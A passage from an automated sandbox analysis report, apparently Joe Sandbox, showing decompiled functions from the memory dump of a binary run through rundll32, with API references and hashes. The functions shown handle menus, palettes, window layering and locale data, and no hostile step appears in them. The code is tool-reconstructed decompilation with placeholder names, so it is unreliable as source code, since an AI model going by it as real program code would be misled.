					_t215 = _t164;
					if(_t164 == 0) {
						E00E40D54(_v8, 1, 1);
						E00E5CAA4(_v8, 1, 1, _t215);
					}
					E00E57A98(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0xe41951);
					return E00E598EC(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0xe7fb20; // 0xf01458
						_t22 = _t194 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t22) {
							_t155 =  *0xe7fb20; // 0xf01458
							_t25 = _t155 + 0x40; // 0x60
							E00E3010C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00E30104( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0xe7fb20; // 0xf01458
					_t28 = _t117 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t28;
					_t199 = E00E41A7C(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00E40D54(_v8, _t122, _t199);
						E00E5CAA4(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

0x00e416f4
0x00e416f5
0x00e416f7
0x00e416fc
0x00e41702
0x00e41709
0x00e4170a
0x00e4170f
0x00e41712
0x00e4171a
0x00e41725
0x00e41730
0x00e41736
0x00e41738
0x00e41742
0x00e4174d
0x00e4175c
0x00e418be
0x00e418c1
0x00e418c7
0x00e418c9
0x00e418d0
0x00e418d0
0x00e418d8
0x00e418de
0x00e418e0
0x00e418e7
0x00e418e7
0x00e418ef
0x00e418f5
0x00e418fb
0x00e418fd
0x00e4190c
0x00e4191e
0x00e4191e
0x00e4192f
0x00e41936
0x00e41939
0x00e4193c
0x00e41949
0x00e41772
0x00e4177c
0x00e41787
0x00e4178d
0x00e41790
0x00e4179c
0x00e417a1
0x00e417bc
0x00e417bc
0x00e41790
0x00e417c1
0x00e417c6
0x00e417cc
0x00e417da
0x00e417df
0x00e417e5
0x00e417e7
0x00e417ed
0x00e417f6
0x00e41809
0x00e41818
0x00e41837
0x00e41837
0x00e41847
0x00e41866
0x00e41866
0x00e41876
0x00e41895
0x00e418b8
0x00e418b8
0x00e41876
0x00000000
0x00e417e7

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 00E417B3
MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4182F
MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4185E
MulDiv.KERNEL32(?,00000000,00000000), ref: 00E4188D
MulDiv.KERNEL32(?,00000000,00000000), ref: 00E418B0

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20205850a4d1dbcf85ce6085c40f17c400eb07bd7b72d7dd8a1ec36334418fb4
Instruction ID: 503ec4aef9b77c972c9b9f8c69c8eca5cb5c152e79fc7ea3b1cc23f8eac113aa
Opcode Fuzzy Hash: 20205850a4d1dbcf85ce6085c40f17c400eb07bd7b72d7dd8a1ec36334418fb4
Instruction Fuzzy Hash: 0C71B274B04208EFDB04DBA8C599AA9B7F5AF49304F2951F4E808EB362D731AE45DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D084 Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E4D084(int __eax, void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t45;
				void* _t47;
				int _t48;
				intOrPtr* _t49;

				_t18 = __eax;
				_t49 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E00E4D084(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00E4D1B4(__eax, _t45, _t47));
					_t48 = _t18;
					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
					while(_t48 > 0) {
						_t45 = _t48 - 1;
						_t18 = GetMenuState(E00E4D1B4(_t49, _t45, _t48), _t45, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00E4D1B4(_t49, _t45, _t48), _t45, 0x400);
							_t40 = 1;
						}
						_t48 = _t48 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
							L14:
							E00E4CF44(_t49, _t45, _t48);
							L15:
							return  *((intOrPtr*)( *_t49 + 0x3c))();
						}
						_t44 =  *0xe4bb98; // 0xe4bbe4
						if(E00E13400( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E00E4D1B4(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0x34));
							 *(_t49 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x00e4d084
0x00e4d088
0x00e4d08e
0x00e4d098
0x00e4d09a
0x00000000
0x00e4d09a
0x00e4d0a3
0x00e4d0a8
0x00000000
0x00e4d0aa
0x00e4d0bc
0x00e4d0c1
0x00e4d0c5
0x00e4d0ca
0x00e4d0d3
0x00e4d0dd
0x00e4d0e4
0x00e4d0f4
0x00e4d0f9
0x00e4d0f9
0x00e4d0fb
0x00e4d0fc
0x00e4d102
0x00e4d108
0x00e4d13d
0x00e4d13f
0x00e4d144
0x00000000
0x00e4d14a
0x00e4d10d
0x00e4d11a
0x00000000
0x00e4d12d
0x00e4d131
0x00e4d138
0x00000000
0x00e4d138
0x00e4d11a
0x00e4d102
0x00e4d151

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf348e48a5f4c068a8bfcd387b37f4a99d267dcedf1502e3c239a48db9abccab
Instruction ID: 9cc9ee9e5de37e0e83e16327cde709af95fa698eb4661639dc8827598162beff
Opcode Fuzzy Hash: bf348e48a5f4c068a8bfcd387b37f4a99d267dcedf1502e3c239a48db9abccab
Instruction Fuzzy Hash: DE1190B170E2499BDB61AB3AAD05B9A37C99F9178CF046025BD51FB342CA64CC468690

Uniqueness

Uniqueness Score: -1.00%

Function 00E3539C Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E3539C(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E00E33D10(_t22);
					}
					_t21 = E00E31864( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E00E31174(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x00e3539c
0x00e353a0
0x00e353a2
0x00e353a9
0x00e353c3
0x00e353c9
0x00e353cb
0x00e353cb
0x00e353e2
0x00e353e7
0x00e353e9
0x00e353ee
0x00e353fc
0x00e35402
0x00e3542b
0x00e3542b
0x00e35404
0x00e35407
0x00e35425
0x00000000
0x00e35427
0x00e35427
0x00e35427
0x00e35425
0x00e3542d
0x00e35432
0x00e3543a
0x00e3543a
0x00e35440
0x00e35449
0x00e3544b
0x00000000
0x00e3544b
0x00e35449
0x00e353ee
0x00e35453

APIs

GetDC.USER32(00000000), ref: 00E353F2
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
ReleaseDC.USER32 ref: 00E35440

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
Instruction ID: 1a09a17ca5d64fb15b03fad26278cede4b8f6f9e96059d5a8277ff3362ee0214
Opcode Fuzzy Hash: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
Instruction Fuzzy Hash: E711D0326417A9AADB24EF349849BFE3ED2AF01756F002124F911BA381D7B088D4C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E45B90 Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E45B90(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0xe7c9f8 != 0) {
					_t16 = E00E5D240(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E00E5CFE0(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e8)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E00E5CFE0(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0xe7c9f8(E00E5CFE0(_t39),  *((intOrPtr*)(_t39 + 0x2ec)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x00E7CA7C |  *0x00E7CA84);
						} else {
							SetWindowLongA(E00E5CFE0(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E00E5CFE0(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}

0x00e45b90
0x00e45b92
0x00e45b98
0x00e45bad
0x00e45bb4
0x00e45bc9
0x00e45bd2
0x00e45be3
0x00e45bf6
0x00e45bf6
0x00000000
0x00e45c38
0x00e45c49
0x00000000
0x00e45c5f
0x00e45bd2
0x00e45bb4
0x00e45c66

APIs

GetWindowLongA.USER32 ref: 00E45BC4
SetWindowLongA.USER32 ref: 00E45BF6
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00E43784), ref: 00E45C30
SetWindowLongA.USER32 ref: 00E45C49
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00E43784), ref: 00E45C5F

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 731f5e2aa6555ed693f12786e1ae07e54e8935e5e89ff94a8214bd453bd710b4
Instruction ID: 128c89c52e00206a061bb259c25ec564304858bc689581c514d6c726e5619244
Opcode Fuzzy Hash: 731f5e2aa6555ed693f12786e1ae07e54e8935e5e89ff94a8214bd453bd710b4
Instruction Fuzzy Hash: 2F11E7716087901FCB50AF785CDAF8927CC0B46355F283974BD99FE287C664C888C328

Uniqueness

Uniqueness Score: -1.00%

Function 00E317CC Relevance: 7.6, APIs: 5, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E317CC(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0xe7f894 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0xe31852);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0xe7f894; // 0x6008075c
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0xe7f894; // 0x6008075c
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0xe31859);
					return ReleaseDC(0, _v12);
				}
			}

0x00e317cd
0x00e317cf
0x00e317d3
0x00e317d5
0x00e317e0
0x00e31860
0x00e317e2
0x00e317e9
0x00e317ee
0x00e317ef
0x00e317f4
0x00e317f7
0x00e31808
0x00e31812
0x00e31818
0x00e3182a
0x00e31830
0x00e31835
0x00e31835
0x00e3183b
0x00e3183e
0x00e31841
0x00e31851
0x00e31851

APIs

GetDC.USER32(00000000), ref: 00E317E4
GetDeviceCaps.GDI32(?,00000068), ref: 00E31800
GetPaletteEntries.GDI32(6008075C,00000000,00000008,?), ref: 00E31818
GetPaletteEntries.GDI32(6008075C,00000008,00000008,?), ref: 00E31830
ReleaseDC.USER32 ref: 00E3184C

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 588e65d4474382012264cc38c02c522ae571704196f2baf118dbe78194d16723
Instruction ID: f03f0d201b0d04d3125ee4edbc14c40c5673c8a394483725c19eaa73ed0ecce2
Opcode Fuzzy Hash: 588e65d4474382012264cc38c02c522ae571704196f2baf118dbe78194d16723
Instruction Fuzzy Hash: A611C071A48344AEFB08DBA49C46FAD7BECE709700F4480A9F608FA5C1DA769488C725

Uniqueness

Uniqueness Score: -1.00%

Function 00E1B3D0 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E1B3D0(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0xe1b467);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00E1B148(GetThreadLocale(), 0xe1b47c, 0x100b,  &_v8);
				_t29 = E00E183E8(0xe1b47c, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00E1B31C, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0xe7f770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00E1B358, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0xe1b46e);
				return E00E14068( &_v8);
			}

0x00e1b3d0
0x00e1b3d3
0x00e1b3d8
0x00e1b3d9
0x00e1b3de
0x00e1b3e1
0x00e1b3f7
0x00e1b409
0x00e1b413
0x00e1b423
0x00e1b428
0x00e1b42d
0x00e1b432
0x00e1b432
0x00e1b438
0x00e1b43b
0x00e1b43b
0x00e1b44c
0x00e1b44c
0x00e1b453
0x00e1b456
0x00e1b459
0x00e1b466

APIs

GetThreadLocale.KERNEL32(?,00000000,00E1B467,?,?,00000000), ref: 00E1B3E8

Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166

GetThreadLocale.KERNEL32(00000000,00000004,00000000,00E1B467,?,?,00000000), ref: 00E1B418
EnumCalendarInfoA.KERNEL32(Function_0000B31C,00000000,00000000,00000004), ref: 00E1B423
GetThreadLocale.KERNEL32(00000000,00000003,00000000,00E1B467,?,?,00000000), ref: 00E1B441
EnumCalendarInfoA.KERNEL32(Function_0000B358,00000000,00000000,00000003), ref: 00E1B44C

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4d008f5c6f1f441ce7f22974f6d3bb269ef1f6f527be63798b8c45b508629946
Instruction ID: e4e71e60bd8b475065391acb0247abf4376ec19f07f9c963678eb694e8f1a774
Opcode Fuzzy Hash: 4d008f5c6f1f441ce7f22974f6d3bb269ef1f6f527be63798b8c45b508629946
Instruction Fuzzy Hash: CC01D6B5640714AFE701B774CC13BDEB2ECDB96710F91A560F530BA6E2EB649E808264

Uniqueness

Uniqueness Score: -1.00%

Function 00E471C0 Relevance: 7.5, APIs: 5, Instructions: 25
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E471C0() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0xe7fb34 != 0) {
					_t10 =  *0xe7fb34; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0xe7fb34 = 0;
				if( *0xe7fb38 != 0) {
					_t2 =  *0xe7fb30; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0xe7fb2c) {
						_t8 =  *0xe7fb38; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0xe7fb38; // 0x0
					CloseHandle(_t5);
					 *0xe7fb38 = 0;
					return 0;
				}
				return 0;
			}

0x00e471c7
0x00e471c9
0x00e471cf
0x00e471cf
0x00e471d6
0x00e471e2
0x00e471e4
0x00e471ea
0x00e471fa
0x00e471fe
0x00e47204
0x00e47204
0x00e47209
0x00e4720f
0x00e47216
0x00000000
0x00e47216
0x00e4721b

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 00E471CF
SetEvent.KERNEL32(00000000,00E493BA,00000000,00E4925E), ref: 00E471EA
GetCurrentThreadId.KERNEL32 ref: 00E471EF
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00E493BA,00000000,00E4925E), ref: 00E47204
CloseHandle.KERNEL32(00000000,00000000,00E493BA,00000000,00E4925E), ref: 00E4720F

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 7c6c900e16562a8a5d0423c2e0c3b60ec70c79e931482b2e318c8f1bd5958d6a
Instruction ID: afe11d81338335c896ccac625678c2117bba0e1212ea09373a8fe98db69dbe0a
Opcode Fuzzy Hash: 7c6c900e16562a8a5d0423c2e0c3b60ec70c79e931482b2e318c8f1bd5958d6a
Instruction Fuzzy Hash: 0EF0A5F2589200DECB10FBBAEDA9A8532E4FB04314B142924F558F31B1DA34D4CACB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E1B480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E1B480(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0xe1b64a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00E14068(__edx);
				E00E1B148(GetThreadLocale(), 0xe1b660, 0x1009,  &_v12);
				if(E00E183E8(0xe1b660, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00E14328(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							break;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0xe7c11c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00E18AC8(_t124 + _t92 - 1, 2, 0xe1b664);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00E18AC8(_t124 + _t92 - 1, 4, 0xe1b674);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00E18AC8(_t124 + _t92 - 1, 2, 0xe1b68c);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00E14330(_t122, 0xe1b6a4);
											L26:
											_t92 = _t92 + 1;
											__eflags = _t92;
											continue;
										}
										__eflags = _t51 != 0x20;
										if(_t51 != 0x20) {
											E00E14250();
											E00E14330(_t122, _v24);
											goto L26;
										}
										goto L24;
									}
									E00E14330(_t122, 0xe1b698);
									_t92 = _t92 + 1;
									goto L26;
								}
								E00E14330(_t122, 0xe1b684);
								_t92 = _t92 + 3;
								goto L26;
							}
							E00E14330(_t122, 0xe1b670);
							_t92 = _t92 + 1;
							goto L26;
						}
						_v8 = E00E1C538(_t124, _t92);
						E00E14588(_t124, _v8, _t92,  &_v20);
						E00E14330(_t122, _v20);
						_t92 = _t92 + _v8;
					}
					L28:
					_pop(_t111);
					 *[fs:eax] = _t111;
					_push(0xe1b651);
					return E00E1408C( &_v24, 4);
				}
				_t75 =  *0xe7f748; // 0x9
				_t76 = _t75 - 4;
				if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
					_t77 = 1;
				} else {
					_t77 = 0;
				}
				if(_t77 == 0) {
					E00E140BC(_t122, _t124);
				} else {
					while(_t92 <= E00E14328(_t124)) {
						_t83 =  *(_t124 + _t92 - 1) - 0x47;
						__eflags = _t83;
						if(_t83 != 0) {
							__eflags = _t83 != 0x20;
							if(_t83 != 0x20) {
								E00E14250();
								E00E14330(_t122, _v16);
							}
						}
						_t92 = _t92 + 1;
						__eflags = _t92;
					}
				}
			}

0x00e1b480
0x00e1b485
0x00e1b486
0x00e1b487
0x00e1b488
0x00e1b489
0x00e1b48d
0x00e1b48f
0x00e1b493
0x00e1b494
0x00e1b499
0x00e1b49c
0x00e1b49f
0x00e1b4a6
0x00e1b4be
0x00e1b4d6
0x00e1b620
0x00e1b622
0x00e1b627
0x00e1b629
0x00000000
0x00000000
0x00e1b53f
0x00e1b544
0x00e1b54b
0x00e1b589
0x00e1b58e
0x00e1b590
0x00e1b5af
0x00e1b5b4
0x00e1b5b6
0x00e1b5d7
0x00e1b5dc
0x00e1b5de
0x00e1b5f3
0x00e1b5f3
0x00e1b5f5
0x00e1b5fb
0x00e1b602
0x00e1b61f
0x00e1b61f
0x00e1b61f
0x00000000
0x00e1b61f
0x00e1b5f7
0x00e1b5f9
0x00e1b610
0x00e1b61a
0x00000000
0x00e1b61a
0x00000000
0x00e1b5f9
0x00e1b5e7
0x00e1b5ec
0x00000000
0x00e1b5ec
0x00e1b5bf
0x00e1b5c4
0x00000000
0x00e1b5c4
0x00e1b599
0x00e1b59e
0x00000000
0x00e1b59e
0x00e1b556
0x00e1b564
0x00e1b56e
0x00e1b573
0x00e1b573
0x00e1b62f
0x00e1b631
0x00e1b634
0x00e1b637
0x00e1b649
0x00e1b649
0x00e1b4dc
0x00e1b4e1
0x00e1b4e4
0x00e1b4f2
0x00e1b4ee
0x00e1b4ee
0x00e1b4ee
0x00e1b4f6
0x00e1b531
0x00e1b4f8
0x00e1b51d
0x00e1b4fe
0x00e1b4fe
0x00e1b500
0x00e1b502
0x00e1b504
0x00e1b50d
0x00e1b517
0x00e1b517
0x00e1b504
0x00e1b51c
0x00e1b51c
0x00e1b51c
0x00e1b528

APIs

GetThreadLocale.KERNEL32(?,00000000,00E1B64A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00E1B4AF

Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166

Strings

ggg, xrefs: 00E1B594
yyyy, xrefs: 00E1B5A1
eeee, xrefs: 00E1B5BA

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: b783661c17f3efc4a9918460b5ed90ed6f59bc2fe410bb7d10f0a1c3a9be9b61
Instruction ID: 3ebf2d6d8050bbdeaa540802931eb279ab495dc996708dfb2497c830caed3f52
Opcode Fuzzy Hash: b783661c17f3efc4a9918460b5ed90ed6f59bc2fe410bb7d10f0a1c3a9be9b61
Instruction Fuzzy Hash: 4241F5B07041058BD711AB7998926FEF2E7EFA4300F643125E462F7396DB30DDC28651

Uniqueness

Uniqueness Score: -1.00%

Function 00E354FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

